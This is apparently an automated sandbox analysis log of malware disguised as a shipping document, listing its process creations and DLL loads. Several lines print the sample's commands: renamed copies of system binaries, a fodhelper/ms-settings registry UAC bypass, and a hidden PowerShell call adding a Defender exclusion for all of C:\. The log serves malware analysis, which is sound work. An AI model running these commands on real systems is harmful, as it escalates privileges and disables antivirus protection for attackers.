Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\agyqwjporhwhb"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\cidbxbaqfqomdosx"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process created: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe /stext "C:\Users\user\AppData\Local\Temp\mcrtxutjtygzocojvhg"
Source: unknown Process created: C:\Users\Public\Libraries\Glzskrlg.PIF "C:\Users\Public\Libraries\Glzskrlg.PIF"
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Process created: C:\Users\Public\Libraries\glrkszlG.pif C:\Users\Public\Libraries\glrkszlG.pif
Source: C:\Users\Public\Libraries\glrkszlG.pif Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: archiveint.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: url.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ieframe.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: smartscreenps.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: nltdll.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ieproxy.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: mssip32.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: winhttpcom.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll (81 consecutive entries)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: am.dll (13 consecutive entries)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: am.dll (34 consecutive entries)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ???.dll (3 consecutive entries)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: am.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ??l.dll (2 consecutive entries)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ?.dll (2 consecutive entries)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ??l.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ????.dll
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ???e???????????.dll (2 consecutive entries)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: ??l.dll (2 consecutive entries)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: am.dll (2 consecutive entries)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll (37 consecutive entries)
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Section loaded: srvcli.dll Jump to behavior
